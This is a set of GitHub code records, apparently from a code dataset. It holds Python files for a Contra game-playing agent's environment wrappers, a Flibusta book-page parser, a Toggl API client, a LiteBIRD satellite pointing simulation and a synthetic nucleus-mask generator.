0, self.env.reset(**kwargs)\n self.states.extend(np.concatenate([state for _ in range(4)], 0))\n return np.array(self.states)[None, :, :, :].astype(np.float32)\n\nclass RewardScaler(gym.RewardWrapper):\n def __init__(self, env, scale=0.25):\n super(RewardScaler, self).__init__(env)\n self.scale = scale\n\n def reward(self, reward):\n return reward * self.scale\n\nclass ContraWinner(gym.Wrapper):\n def __init__(self, env):\n super(ContraWinner, self).__init__(env)\n self.zeros, self.level, self.lives, self.finish = 0, 0, 0, None\n self.actions = deque(maxlen=50)\n\n def step(self, action):\n state, reward, done, info = self.env.step(action)\n if self.finish == None:\n self.lives, self.level = info[\"lives\"], info[\"level\"]\n self.finish = lambda level: level != self.level\n self.lives = max(self.lives, info[\"lives\"])\n info[\"finish\"] = self.finish(info[\"level\"])\n self.actions.append((action, max(0, reward)))\n self.zeros += not reward\n done |= info[\"finish\"] or info[\"lives\"] < self.lives or self.zeros > 500 \\\n or self.actions.count((action, 0)) == self.actions.maxlen\n if done:\n if info[\"finish\"]:\n reward += 1000\n else:\n reward += -10\n return state, reward, done, info\n\n def reset(self, **kwargs):\n self.zeros, self.level, self.lives, self.finish = 0, 0, 0, None\n self.actions.clear()\n return self.env.reset(**kwargs)\n\ndef create_runtime_env(game, state, action_type, record=False):\n actions = utils.Actions.get(action_type)\n assert actions, \"Invalid action type.\"\n env = make(game, state, record=record)\n env = ActionsDiscretizer(env, actions)\n env = ProcessFrame(env)\n env = AllowBacktracking(env)\n env = RewardScaler(env)\n env = ContraWinner(env)\n return env, env.observation_space.shape[0], len(actions)\n","repo_name":"mycode2021/Agent-contra","sub_path":"utils/env.py","file_name":"env.py","file_ext":"py","file_size_in_byte":4107,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"3598497767","text":"# -*- coding: utf-8 -*-\n\nimport re\nfrom analyser.adds.helpers import make_correct_link\nfrom analyser.adds import logger\n\nclass Retriever:\n\n @staticmethod\n def get_summary(soup):\n annotation_text = soup.find('h2',text=u'Аннотация')\n annotation_tag = annotation_text.parent\n paragraph_with_summary = 1;\n p_with_summary = annotation_tag.findNextSiblings('p')\n if len(p_with_summary) < 2:\n return None\n p_with_summary = p_with_summary[paragraph_with_summary]\n # check on case with empty annotation:\n ch = p_with_summary.findChildren()\n if ch:\n if ch[0].name == u'a':\n return None\n return p_with_summary.text\n\n @staticmethod\n def get_links(soup, page_link):\n links = {}\n select = soup.find('select', id='useropt')\n if select:\n format_options = select.findAll('option')\n formats = []\n for format_option in format_options:\n formats.append(format_option['value'])\n for format in formats:\n link = \"%s/%s\" % (page_link, format)\n links[format] = make_correct_link(page_link, link)\n else:\n number = Retriever.get_booknumber_from_link(page_link)\n anchors = soup.findAll('a', href=re.compile('/b/%s/[A-z]+$' % number ))\n anchors = filter(Retriever.is_available_anchor, anchors)\n for link in anchors:\n format = Retriever.get_format_from_anchor(link)\n correct_link = make_correct_link(page_link, link['href'])\n links[format] = correct_link\n return links\n\n @staticmethod\n def is_available_anchor(anchor):\n unavailable = ('forum','read','edit','complain')\n m = re.search('/b/[0-9]+/([A-z]+)', anchor['href'])\n if not m:\n return False\n format = m.groups()[0]\n if format in unavailable:\n return False\n return True\n\n @staticmethod\n def get_format_from_anchor(anchor):\n m = re.search('/b/[0-9]+/([A-z]+)', anchor['href'])\n format = m.groups()[0]\n if format == 'download':\n format = anchor.text.split()[1]\n format = format[:-1] #clean up from ')'\n return format\n\n @staticmethod\n def get_booknumber_from_link(link):\n m = re.search('/b/([0-9]+)', link)\n number = m.groups()[0]\n return number\n\n @staticmethod\n def get_tags(soup):\n tags = [ anchor_tag.text for anchor_tag in soup.findAll('a', {\"class\":\"genre\"})]\n return tags\n\n @staticmethod\n def get_picture_link(soup):\n img = soup.find('img', src=re.compile('/i/[0-9\\/]+cover.jpg$'))\n if not img:\n return None\n return img['src']\n\n @staticmethod\n def get_picture(soup,page_link, id):\n img_link = Retriever.get_picture_link(soup)\n if not img_link:\n return None\n img_link = make_correct_link(page_link,img_link)\n return img_link\n\n @staticmethod\n def read_description(description_line):\n description = {}\n #Last Name;First Name;Middle Name;Title;Subtitle;Language;Year;Series;ID\n field_list = ['lastname', 'firstname', 'middlename', 'title', 'subtitle', 'language','year',' series', 'ID' ]\n line = description_line[:-1] #remove \\n from the end of line\n descr_list = line.split(';')\n if len(descr_list) != len(field_list):\n descr_list = Retriever.processing_describe_list(descr_list)\n for number, field in enumerate(field_list):\n description[field] = descr_list[number]\n return description\n\n @staticmethod\n def processing_describe_list(descr_list):\n length = len(descr_list)\n if length >=9:\n # 0 1 2 3 4 5 6 7 8\n #Last Name;First Name;Middle Name;Title;Subtitle;Language;Year;Series;ID\n descr_list[3] = \";\".join(descr_list[3:-5]) # split all part of title togehter\n descr_list[4:] = descr_list[-5:length] # subtitle, language, year, series, ID <---\n descr_list = descr_list[0:9] # cutting to right number of fields\n return descr_list","repo_name":"ktisha/ebook-service","sub_path":"analyser/parsers/FlibustaNet/Retriever.py","file_name":"Retriever.py","file_ext":"py","file_size_in_byte":4301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14396227535","text":"import requests\n\n\nclass TogglClientApi:\n\n defaultCredentials = {\n 'token': '',\n 'username': '',\n 'workspace_name': '',\n 'base_url': 'https://www.toggl.com/api',\n 'ver_api': 8,\n 'base_url_report': 'https://toggl.com/reports/api',\n 'ver_report': 2\n }\n credentials = {}\n api_token = ''\n api_username = ''\n api_base_url = None\n api_report_base_url = None\n workspace_name = None\n requests = None\n\n def __init__(self, credentials):\n self.credentials = dict(self.defaultCredentials.items() + credentials.items())\n self.api_base_url = self.build_api_url(self.credentials['base_url'], self.credentials['ver_api'])\n self.api_report_base_url = self.build_api_url(self.credentials['base_url_report'], self.credentials['ver_report'])\n self.api_token = self.credentials['token']\n self.api_username = self.credentials['username']\n return\n\n @staticmethod\n def build_api_url(base_url, version):\n return base_url + '/v' + str(version)\n\n def get_workspace_by_name(self, name):\n workspace_found = None\n list_response = self.get_workspaces();\n\n if list_response.status_code != requests.codes.ok:\n list_response.raise_for_status()\n\n workspace_list = list_response.json()\n for workspace in workspace_list:\n if workspace['name'] == name:\n workspace_found = workspace\n\n return workspace_found\n\n def get_workspaces(self):\n return self.query('/workspaces');\n\n def get_workspace_members(self, workspace_id):\n response = self.query('/workspaces/'+str(workspace_id)+'/workspace_users');\n return response\n\n \"\"\"\n @param start_date YYYY-MM-DD\n @param end_date YYYY-MM-DD\n \"\"\"\"\"\n def get_user_hours_range(self, user_agent, workspace_id, user_id, start_date, end_date):\n params = {\n 'workspace_id': workspace_id,\n 'since': start_date,\n 'until': end_date,\n 'user_agent': user_agent,\n 'user_ids': user_id,\n 'grouping': 'users',\n 'subgrouping': 'projects'\n }\n projects_worked_response = self.query_report('/summary', params)\n\n json_response = projects_worked_response.json()\n\n if len(json_response['data']) > 0:\n time_total = json_response['data'][0]['time']\n else:\n time_total = 0\n\n return time_total\n\n def query_report(self, url, params={}, method='GET'):\n return self._query(self.api_report_base_url, url, params, method)\n\n def query(self, url, params={}, method='GET'):\n return self._query(self.api_base_url, url, params, method)\n\n def _query(self, base_url, url, params, method):\n api_endpoint = base_url + url\n toggl_auth = (self.api_token, 'api_token')\n toggl_headers = {'content-type': 'application/json'}\n\n if method == \"POST\":\n return False\n elif method == \"GET\":\n response = self._do_get_query(api_endpoint, headers=toggl_headers, auth=toggl_auth, params=params)\n else:\n response = self._do_get_query(api_endpoint, headers=toggl_headers, auth=toggl_auth, params=params)\n\n return response\n\n @staticmethod\n def _do_get_query(url, headers, auth, params):\n response = requests.get(url, headers=headers, auth=auth, params=params)\n\n return response","repo_name":"mechastorm/toggl-python-api-client","sub_path":"api_client.py","file_name":"api_client.py","file_ext":"py","file_size_in_byte":3446,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"52"} +{"seq_id":"74969046243","text":"\nimport sys\nimport os\nimport time\nimport argparse\n\nimport numpy as np\nimport healpy as hp\nimport quaternionarray as qa\n\nimport litebird as lb\n\n\ncomm = None\nrank = 0\nnproc = 1\n\ndef lbtime():\n if comm is not None:\n return MPI.Wtime()\n else:\n return time.time()\n\ndef boresight_sim(nsim=1000, qprec=None, samplerate=23.0, spinperiod=10.0, spinangle=30.0, precperiod=93.0, precangle=65.0):\n\n spinrate = 1.0 / (60.0 * spinperiod)\n spinangle = spinangle * np.pi / 180.0\n precrate = 1.0 / (60.0 * precperiod)\n precangle = precangle * np.pi / 180.0\n\n xaxis = np.array([1,0,0], dtype=np.float64)\n yaxis = np.array([0,1,0], dtype=np.float64)\n zaxis = np.array([0,0,1], dtype=np.float64)\n\n satrot = None\n if qprec is None:\n satrot = np.tile(qa.rotation(np.array([0.0, 1.0, 0.0]), np.pi/2), nsim).reshape(-1,4)\n elif qprec.flatten().shape[0] == 4:\n satrot = np.tile(qprec, nsim).reshape(-1,4)\n elif qprec.shape == (nsim, 4):\n satrot = qprec\n else:\n raise RuntimeError(\"qprec has wrong dimensions\")\n\n # Time-varying rotation about precession axis. \n # Increment per sample is\n # (2pi radians) X (precrate) / (samplerate)\n # Construct quaternion from axis / angle form.\n precang = np.arange(nsim, dtype=np.float64)\n precang *= 2.0 * np.pi * precrate / samplerate\n\n # (zaxis, precang)\n cang = np.cos(0.5 * precang)\n sang = np.sin(0.5 * precang)\n precaxis = np.multiply(sang.reshape(-1,1), np.tile(zaxis, nsim).reshape(-1,3))\n precrot = np.concatenate((precaxis, cang.reshape(-1,1)), axis=1)\n\n # Rotation which performs the precession opening angle\n precopen = qa.rotation(np.array([1.0, 0.0, 0.0]), precangle)\n\n # Time-varying rotation about spin axis. Increment \n # per sample is\n # (2pi radians) X (spinrate) / (samplerate)\n # Construct quaternion from axis / angle form.\n spinang = np.arange(nsim, dtype=np.float64)\n spinang *= 2.0 * np.pi * spinrate / samplerate\n\n cang = np.cos(0.5 * spinang)\n sang = np.sin(0.5 * spinang)\n spinaxis = np.multiply(sang.reshape(-1,1), np.tile(zaxis, nsim).reshape(-1,3))\n spinrot = np.concatenate((spinaxis, cang.reshape(-1,1)), axis=1)\n\n # Rotation which performs the spin axis opening angle\n spinopen = qa.rotation(np.array([1.0, 0.0, 0.0]), spinangle)\n\n # compose final rotation\n boresight = qa.mult(satrot, qa.mult(precrot, qa.mult(precopen, qa.mult(spinrot, spinopen))))\n\n return boresight\n\n\ndef sim2(fp, freq, borequats, hwpang, hits, alps, inpp=None, hwprate=88.0, outdir = ''):\n\n nsim = borequats.shape[0]\n nhpix = hits.shape[0]\n nside = int(np.sqrt(nhpix / 12))\n\n if nhpix != 12*nside*nside:\n raise RuntimeError('invalid healpix nside value')\n if hwpang.shape[0] != borequats.shape[0]:\n raise RuntimeError('HWP angle vector must be same length as boresight quaternions')\n if inpp is not None:\n if inpp.shape[0] != nhpix:\n raise RuntimeError('N_pp^-1 number of pixels must match N_hits')\n if inpp.shape[1] != 6:\n raise RuntimeError('N_pp^-1 must have 6 elements per pixel')\n\n xaxis = np.array([1,0,0], dtype=np.float64)\n yaxis = np.array([0,1,0], dtype=np.float64)\n zaxis = np.array([0,0,1], dtype=np.float64)\n\n # generate hitcount map and alpha\n for i, det in enumerate(fp.detectors(freq=freq)):\n\n detrot = qa.mult(borequats, fp.quat(det))\n detdir = qa.rotate(detrot, np.tile(zaxis, nsim).reshape(-1,3))\n dettheta, detphi = hp.vec2ang(detdir)\n detpix = hp.vec2pix(nside, detdir[:,0], detdir[:,1], detdir[:,2])\n detbinned = np.bincount(detpix)\n hits[0:detbinned.shape[0]] += detbinned[:]\n\n outfile = os.path.join(outdir, 'theta.bin')\n with open(outfile, 'wb') as f:\n dettheta.tofile(f)\n outfile = os.path.join(outdir, 'phi.bin')\n with open(outfile, 'wb') as f:\n detphi.tofile(f)\n outfile = os.path.join(outdir, 'pix.bin')\n with open(outfile, 'wb') as f:\n detpix.tofile(f)\n\n if np.mod(i,2)!=1: \n alpdir = qa.rotate(detrot, np.tile(xaxis, nsim).reshape(-1,3))\n x = alpdir[:,0]*detdir[:,1] - alpdir[:,1]*detdir[:,0]\n y = alpdir[:,0]*(-detdir[:,2]*detdir[:,0]) + alpdir[:,1]*(-detdir[:,2]*detdir[:,1]) + alpdir[:,2]*(detdir[:,0]*detdir[:,0]+detdir[:,1]*detdir[:,1]) \n angle = np.arctan2(y,x)\n\n outfile = os.path.join(outdir, 'angle.bin')\n with open(outfile, 'wb') as f:\n angle.tofile(f)\n\n #denom = (detbinned+1e-6)*np.float(len(fp.detectors(freq=freq)))\n #for n in range(4):\n # Re = np.bincount(detpix, weights=np.cos((n+1)*angle))/denom\n # Im = np.bincount(detpix, weights=np.sin((n+1)*angle))/denom\n # alps[0:Re.shape[0],2*n] += Re\n # alps[0:Im.shape[0],2*n+1] += Im\n #print(np.mean(alps[:,0]),np.mean(alps[:,4]))\n\n\ndef main():\n\n if rank == 0:\n print(\"Running with {} processes\".format(nproc))\n\n global_start = lbtime()\n\n allowed_freq = []\n for type in sorted(lb.pixel_types):\n for f in lb.pixel_to_freq[type]:\n allowed_freq.append(f)\n allowed_str = \", \".join(allowed_freq)\n #allowed_str = ''\n\n parser = argparse.ArgumentParser( description='Simulate LiteBird pointing.' )\n parser.add_argument( '--frequency', required=False, default='040', help='Frequency as a 3-digit string. Valid values are {}'.format(allowed_str) )\n parser.add_argument( '--samplerate', required=False, default=1.0, help='Detector sample rate (Hz)' )\n parser.add_argument( '--spinperiod', required=False, default=10.0, help='The period (in minutes) of the rotation about the spin axis' )\n parser.add_argument( '--spinangle', required=False, default=30.0, help='The opening angle (in degrees) of the boresight from the spin axis' )\n parser.add_argument( '--precperiod', required=False, default=90.0, help='The period (in minutes) of the rotation about the precession axis' )\n parser.add_argument( '--precangle', required=False, default=65.0, help='The opening angle (in degrees) of the spin axis from the precession axis' )\n parser.add_argument( '--hwprpm', required=False, default=0.0, help='The rate (in RPM) of the HWP rotation' )\n parser.add_argument( '--hwpstep', required=False, default=None, help='For stepped HWP, the angle in degrees of each step' )\n parser.add_argument( '--hwpsteptime', required=False, default=0.0, help='For stepped HWP, the the time in seconds between steps' )\n parser.add_argument( '--obs', required=False, default=24.0, help='Number of hours in one science observation' )\n parser.add_argument( '--gap', required=False, default=0.0, help='Cycle time in hours between science obs' )\n parser.add_argument( '--numobs', required=False, default=1, help='Number of complete science + gap observations' )\n parser.add_argument( '--nside', required=False, default=1024, help='Healpix NSIDE' )\n parser.add_argument( '--invnpp', required=False, default=False, action='store_true', help='Also compute the block diagonal N_pp^-1 matrix' )\n parser.add_argument( '--fp', required=False, default=\"boreshift\", help='Allowed values are \"bore\", \"nominal\", \"mirror\", \"radial\"' )\n parser.add_argument( '--wafersize', required=False, default=86.6, help='Wafer width in millimeters' )\n parser.add_argument( '--waferang', required=False, default=3.0, help='Angular size (in degrees) of wafer' )\n parser.add_argument( '--outdir', required=False, default='.', help='Output directory' )\n parser.add_argument( '--debug', required=False, default=False, action='store_true', help='Write focalplane image and other diagnostics' )\n parser.add_argument( '--shiftx', required=False, default=0., help='how much shifting of the detector on the focal plane in the x direction' )\n parser.add_argument( '--shifty', required=False, default=0., help='how much shifting of the detector on the focal plane in the y direction' )\n args = parser.parse_args()\n\n nside = int(args.nside)\n npix = 12 * nside * nside\n\n samplerate = float(args.samplerate)\n spinperiod = float(args.spinperiod)\n spinangle = float(args.spinangle)\n precperiod = float(args.precperiod)\n precangle = float(args.precangle)\n\n wafer_mm = float(args.wafersize)\n wafer_deg = float(args.waferang)\n\n hwprate = float(args.hwprpm)\n hwpstep = None\n if args.hwpstep is not None:\n hwpstep = float(args.hwpstep)\n hwpsteptime = float(args.hwpsteptime)\n\n start = lbtime()\n fp = None\n freq = args.frequency\n shiftx = float(args.shiftx)\n shifty = float(args.shifty)\n\n #create a single detector, and give it a shift on the focal plane\n if args.fp == \"boreshift\":\n pol = lb.pol_angles_qu(1)\n pixels = ['L1A']\n wafers = []\n wafers.append( (lb.Wafer(pixels=pixels, pol=pol), \"{}B\".format(''), np.array([shiftx, shifty, 0.0])) )\n fp = lb.FocalPlane(wafers=wafers)\n \n elif args.fp == \"bore\":\n fp = lb.create_focalplane_bore()\n freq = allowed_freq[0]\n elif int(args.frequency) > 250:\n fp = lb.create_HFT_nominal(wafer_mm, wafer_deg, margin=8.0)\n else:\n if args.fp == \"nominal\":\n fp = lb.create_LFT_nominal(wafer_mm, wafer_deg, margin=8.0)\n elif args.fp == \"mirror\":\n fp = lb.create_LFT_mirror(wafer_mm, wafer_deg, margin=8.0)\n elif args.fp == \"radial\":\n fp = lb.create_LFT_radial(wafer_mm, wafer_deg, margin=8.0)\n else:\n raise RuntimeError(\"Unknown focalplane type \\\"{}\\\"\".format(args.fp))\n stop = lbtime()\n if rank == 0:\n print(\"Create focalplane: {:.2f} seconds\".format(stop-start))\n\n if args.outdir != '.':\n if not os.path.isdir(args.outdir):\n os.mkdir(args.outdir)\n\n if args.debug:\n if rank == 0:\n import matplotlib.pyplot as plt\n import litebird.vis as lbv\n fig = plt.figure( figsize=(36,18), dpi=100 )\n ax = fig.add_subplot(1, 1, 1)\n lbv.view_focalplane(fp, ax, freq=args.frequency)\n outfile = os.path.join(args.outdir, 'focalplane.png')\n plt.savefig(outfile)\n\n hits = np.zeros(npix)\n alps = np.zeros((npix,8))\n inpp = None\n if args.invnpp:\n inpp = np.zeros((npix, 6), dtype=np.float64)\n\n obs = 3600.0 * float(args.obs)\n gap = 3600.0 * float(args.gap)\n obssamples = int(obs * samplerate)\n gapsamples = int(gap * samplerate)\n nobs = int(args.numobs)\n simsamples = obssamples + gapsamples\n\n # compute which observations this process is responsible for\n\n startobs = 0\n stopobs = nobs\n\n if comm is not None:\n myobs = nobs // nproc\n leftover = nobs % nproc\n if ( rank < leftover ):\n myobs += 1\n startobs = rank * myobs\n else:\n startobs = ((myobs + 1) * leftover) + (myobs * (rank - leftover))\n stopobs = startobs + myobs\n if myobs == 0:\n print(\"WARNING: process {} assigned no data and will be idle\".format(rank))\n\n # Assume that we constantly slew the precession axis at one\n # degree per day, regardless of whether we are in a science\n # observation or a cooler cycle.\n\n # this is the increment per sample\n angincr = (np.pi / 180.0) / (24.0 * 3600.0 * samplerate)\n\n # this is the increment per complete observation\n obincr = angincr * simsamples\n\n if comm is not None:\n comm.barrier()\n start = lbtime()\n\n elapsed_bore = 0\n elapsed_sim = 0\n\n for ob in range(nobs):\n\n if (ob < startobs) or (ob >= stopobs):\n continue\n\n start_bore = lbtime()\n # Compute the time-varying quaternions representing the rotation\n # from the coordinate frame to the precession axis frame. The\n # angle of rotation is fixed (PI/2), but the axis starts at the Y\n # coordinate axis and sweeps.\n\n # angle about coordinate z-axis\n satang = np.arange(simsamples, dtype=np.float64)\n satang *= angincr\n satang += ob * obincr + (np.pi / 2)\n\n # this is the time-varying rotation axis\n # sataxis = [cos(ft+pi/2), sin(ft+pi/2), 0]\n cang = np.cos(satang)\n sang = np.sin(satang)\n sataxis = np.concatenate((cang.reshape(-1,1), sang.reshape(-1,1), np.zeros((simsamples,1))), axis=1)\n\n # now construct the axis-angle quaternion\n # the rotation about the axis is always pi/2 (in order to change z->x at t=0)\n # satquat = (sataxis, pi/2)\n csatrot = np.cos(0.25 * np.pi)\n ssatrot = np.sin(0.25 * np.pi)\n sataxis = np.multiply(np.repeat(ssatrot, simsamples).reshape(-1,1), sataxis)\n satquat = np.concatenate((sataxis, np.repeat(csatrot, simsamples).reshape(-1,1)), axis=1)\n\n #borequats = lb.boresight_sim(nsim=simsamples, qprec=satquat, samplerate=samplerate, spinperiod=spinperiod, spinangle=spinangle, precperiod=precperiod, precangle=precangle)\n borequats = boresight_sim(nsim=simsamples, qprec=satquat, samplerate=samplerate, spinperiod=spinperiod, spinangle=spinangle, precperiod=precperiod, precangle=precangle)\n\n stop_bore = lbtime()\n elapsed_bore += stop_bore - start_bore\n\n start_sim = lbtime()\n\n hwpang = lb.hwp_angles(0, simsamples, samplerate, hwprate, hwpstep, hwpsteptime)\n\n #lb.simulate(fp, args.frequency, borequats, hwpang, hits, inpp=inpp)\n sim2(fp, args.frequency, borequats, hwpang, hits, alps, inpp=inpp, outdir = args.outdir)\n \n stop_sim = lbtime()\n elapsed_sim += stop_sim - start_sim\n \n\n min_bore = np.zeros(1)\n max_bore = np.zeros(1)\n min_sim = np.zeros(1)\n max_sim = np.zeros(1)\n\n if comm is not None:\n comm.barrier()\n comm.Reduce(np.array(float(elapsed_bore)), min_bore, op=MPI.MIN, root=0)\n comm.Reduce(np.array(float(elapsed_bore)), max_bore, op=MPI.MAX, root=0)\n comm.Reduce(np.array(float(elapsed_sim)), min_sim, op=MPI.MIN, root=0)\n comm.Reduce(np.array(float(elapsed_sim)), max_sim, op=MPI.MAX, root=0)\n else:\n min_bore[0] = elapsed_bore\n max_bore[0] = elapsed_bore\n min_sim[0] = elapsed_sim\n max_sim[0] = elapsed_sim\n\n stop = lbtime()\n\n if rank == 0:\n print(\"Parallel Simulation: {:.2f} seconds\".format(stop-start))\n print(\" Boresight calculation: min = {:.2f} s, max = {:.2f} s\".format(min_bore[0], max_bore[0]))\n print(\" Detector pointing and accumulate: min = {:.2f} s, max = {:.2f} s\".format(min_sim[0], max_sim[0]))\n\n start = lbtime()\n\n fullhits = None\n fullinpp = None\n\n if comm is not None:\n if rank == 0:\n fullhits = np.zeros(npix, dtype=np.float64)\n if inpp is not None:\n fullinpp = np.zeros((npix, 6), dtype=np.float64)\n\n comm.Reduce(hits, fullhits, op=MPI.SUM, root=0)\n if inpp is not None:\n comm.Reduce(inpp, fullinpp, op=MPI.SUM, root=0)\n else:\n fullhits = hits\n fullinpp = inpp\n\n stop = lbtime()\n if rank == 0:\n print(\"Reduction: {:.2f} seconds\".format(stop-start))\n\n\n start = lbtime()\n\n if rank == 0:\n\n #outfile = os.path.join(args.outdir, 'hits.fits')\n #hp.fitsfunc.write_map(outfile,hits)\n outfile = os.path.join(args.outdir, 'hits.bin')\n with open(outfile, 'wb') as f:\n fullhits.tofile(f)\n\n if fullinpp is not None:\n outfile = os.path.join(args.outdir, 'invnpp.bin')\n with open(outfile, 'wb') as f:\n fullinpp.tofile(f)\n\n stop = lbtime()\n if rank == 0:\n print(\"Write hits and N_pp^-1: {:.2f} seconds\".format(stop-start))\n\n if comm is not None:\n comm.barrier()\n global_stop = lbtime()\n if rank == 0:\n print(\"Total Time: {:.2f} seconds\".format(global_stop-global_start))\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"hungiyang/litebird","sub_path":"litebird_tod/create_pointing.py","file_name":"create_pointing.py","file_ext":"py","file_size_in_byte":16019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73635400164","text":"import math, random\nimport numpy as np\nfrom PIL import Image, ImageDraw\nfrom scipy import ndimage\nfrom tqdm import tqdm\nfrom skimage.filters import gaussian\nfrom scipy.stats import beta\nfrom bayes_opt import BayesianOptimization\nfrom scipy.ndimage import distance_transform_cdt\n\n\nclass OVERLAP_AREA:\n def __init__(self, mask):\n self.mask=mask\n self.distance_map = self.get_distance_map()\n self.state_dict = None\n self.label = 1\n \n def set_param(self, **kwargs):\n self.state_dict = kwargs\n self.mask[self.state_dict['x'], self.state_dict['y']] = 0\n self.distance_map = self.get_distance_map()\n \n def __call__(self, ecc, angle):\n ellps = draw_polygon(ecc=ecc, angle=angle, s=self.mask.shape[0], **self.state_dict)\n# ellps = draw_ellipse(center=self.center,\n# a=a,\n# b=b,\n# angle=angle,\n# mask_shape=self.mask.shape,\n# )\n ellps = ellps.astype(bool)\n mask = self.mask>0\n return -(ellps&mask).sum()/(self.distance_map[ellps].sum()/10+1e-6)\n \n def draw(self, ecc, angle):\n ellps = draw_polygon(ecc=ecc, angle=angle, s=self.mask.shape[0], **self.state_dict)\n self.mask[ellps.astype(bool)] = self.label\n self.distance_map = self.get_distance_map()\n self.label += 1\n \n def get_mask(self):\n return self.mask\n \n def get_distance_map(self):\n return distance_transform_cdt(~(self.mask>0))\n\n \ndef random_polygon_params():\n area, irr, spike, nverti = get_rand_polygon_param(nsize, **kwargs);\n\ndef generate_fake_mask_from_points(points, nsize, var_x=0, var_y=0, ntry_max=30, **kwargs):\n bin_mask = np.zeros((nsize,nsize))\n color_mask = np.zeros((nsize,nsize))\n\n density = np.zeros((nsize, nsize), dtype=np.uint8)\n for c_row, c_col in points:\n density[int(c_row), int(c_col)] = 255\n ov = OVERLAP_AREA(density)\n density = gaussian(density, 20)\n \n with tqdm(total=len(points)) as pbar:\n for nuclei_no, (x, y) in enumerate(points):\n mu_Area = 1000*np.exp(-1000*np.array(density[x, y]))+100\n var_Area = 1700000*np.exp(-2800*np.array(density[x, y]))+100\n max_Area = 8000*np.exp(-1300*np.array(density[x, y]))+200\n area, irr, spike, nverti = get_rand_polygon_param(mu_Area=mu_Area, sigma_Area=var_Area, max_Area = max_Area,)\n \n ov.set_param(x=x, y=y, area=area, irr=irr, spike=spike, nverti=nverti)\n# ecc = np.random.rand()\n# angle = random.uniform(0, 2*math.pi)\n \n pbounds = {'ecc':[0.5,1], 'angle':[0,180]}\n optimizer = BayesianOptimization(\n f=ov,\n pbounds=pbounds,\n verbose=0,\n random_state=nuclei_no,\n )\n optimizer.maximize(\n init_points=1,\n n_iter=ntry_max,\n )\n ov.draw(**optimizer.max['params'])\n# ov.draw(ecc, angle)\n \n \n \n# overlap = np.sum((im_add*bin_mask)>0) / (np.sum(im_add>0).astype(np.float32))\n# ntry = 0\n# while (overlap>0.05) and (ntry0) / (np.sum(im_add>0).astype(np.float32))\n# ntry += 1\n# color_mask[im_add.astype(bool)] = nuclei_no+1\n# bin_mask[im_add.astype(bool)] = 1\n# # contour += con_add\n pbar.update(1)\n return ov\n\n\ndef generate_fake_mask_from_points_old(points, nsize, ntry_max = 50, **kwargs):\n bin_mask = np.zeros((nsize,nsize,3))\n color_mask = np.zeros((nsize,nsize,3))\n contour = np.zeros((nsize,nsize,3))\n with tqdm(total=len(points)) as pbar:\n for nuclei_no, (x, y) in enumerate(points):\n im_add, con_add = rand_nucleus(x=x, y=y, nsize = nsize, **kwargs)\n overlap = np.sum((im_add*bin_mask)>0) / (np.sum(im_add>0).astype(np.float32))\n ntry = 0\n while (overlap>0.05) and (ntry0) / (np.sum(im_add>0).astype(np.float32))\n ntry += 1\n color_mask += im_add * np.random.rand(3)[None,None]\n bin_mask += im_add\n contour += con_add\n pbar.update(1)\n return color_mask, bin_mask, contour\n\n\ndef get_rand_polygon_param(mu_Area=600, sigma_Area=400, max_Area = 500,\n mu_irr=0.6, sigma_irr=2.0, \n mu_spike=0.04, sigma_spike=0.005, \n mu_nverti=20, sigma_nverti=8):\n beta_mean = mu_Area/max_Area\n beta_var = sigma_Area/max_Area**2\n beta_a = beta_mean**2*(1-beta_mean)/beta_var-beta_mean\n beta_b = beta_mean*(1-beta_mean)**2/beta_var-1+beta_mean\n if beta_a < 0 or beta_b < 0:\n import pdb\n pdb.set_trace()\n area = beta.rvs(beta_a, beta_b)*max_Area;\n irr = mu_irr+random.random()*sigma_irr;\n spike = mu_spike+random.random()*sigma_spike;\n nverti = int(random.random()*sigma_nverti+mu_nverti);\n return area, irr, spike, nverti;\n\n\ndef draw_polygon(x=None, y=None, area=None, ecc=None, \n irr=None, spike=None, nverti=None, s=None, angle=None):\n angle = angle/180.0*math.pi\n vertices = generatePolygon(x, y, area, ecc, irr, spike, nverti, angle);\n mask = Image.fromarray(np.zeros((s, s), dtype=np.uint8));\n draw = ImageDraw.Draw(mask);\n draw.polygon(vertices, fill=1);\n return np.array(mask);\n\ndef rand_nucleus(x, y, ecc=0, angle=0, nsize = 460, **kwargs):\n area, irr, spike, nverti = get_rand_polygon_param(nsize, **kwargs);\n mask = draw_polygon(x, y, area, ecc, irr, spike, nverti, nsize, angle);\n return mask\n\n\ndef generatePolygon(ctrX, ctrY, Area, eccentricity, irregularity, spikeyness, numVerts, angle):\n irregularity = clip( irregularity, 0,1 ) * 2*math.pi / numVerts\n eccentricity = clip(eccentricity, 0, 1)\n semi_minor = math.sqrt(Area*math.sqrt(1-eccentricity**2)/math.pi)\n\n # generate n angle steps\n angleSteps = []\n lower = (2*math.pi / numVerts) - irregularity\n upper = (2*math.pi / numVerts) + irregularity\n angle_sum = 0\n for i in range(numVerts):\n tmp = random.uniform(lower, upper)\n angleSteps.append( tmp )\n angle_sum = angle_sum + tmp\n \n # normalize the steps so that point 0 and point n+1 are the same\n k = angle_sum / (2*math.pi)\n for i in range(numVerts):\n angleSteps[i] = angleSteps[i] / k\n \n points = []\n# angle = random.uniform(0, 2*math.pi)\n init_angle = angle\n\n for i in range(numVerts):\n r_i = semi_minor//(math.sqrt(1-(eccentricity*math.cos(angle))**2)+1e-6)\n tmp_spikeyness = clip(spikeyness, 0, 1) * r_i\n r_i = clip(random.gauss(r_i, tmp_spikeyness), 0, 2*semi_minor)\n x = ctrX + r_i*math.cos(angle-init_angle)\n y = ctrY + r_i*math.sin(angle-init_angle)\n points.append((int(x), int(y)))\n\n angle = angle + angleSteps[i]\n \n return points\n \n\n\ndef clip(x, min, max):\n if( min > max ): return x\n elif( x < min ): return min\n elif( x > max ): return max\n else: return x\n","repo_name":"CJLee94/Points2Image","sub_path":"polygon_v2.py","file_name":"polygon_v2.py","file_ext":"py","file_size_in_byte":7710,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"71826840484","text":"# calling list\ndata = [\"antonio\", 2, \"sebastian\"]\nprint(data[1])\n\nfriends = [[\"diana\", 24], [\"jack\", 28], [\"liza\", 30]]\nprint(friends[0][0])\n\n\n# adding value 